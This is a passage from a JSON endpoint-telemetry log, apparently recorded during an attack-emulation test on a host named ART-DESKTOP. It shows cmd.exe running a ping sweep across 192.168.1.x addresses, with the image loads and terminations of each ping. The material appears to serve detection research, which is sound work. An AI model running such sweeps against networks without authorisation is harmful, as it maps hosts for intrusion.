"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "process", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572241830000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.54", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572242020000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572241980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "event_type": "process", - "pid": 7688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572246830000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.55", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3496, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572246980000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "process", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572251830000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.56", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4796, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572251980000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572252140000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "process", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572256840000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.57", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "process", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572261990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.58", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "process", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572266840000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.59", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4692, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572266990000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "process", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "subtype": "terminate", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "process", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "subtype": "terminate", - "timestamp": 131883572269020000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "process", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572271990000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.60", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 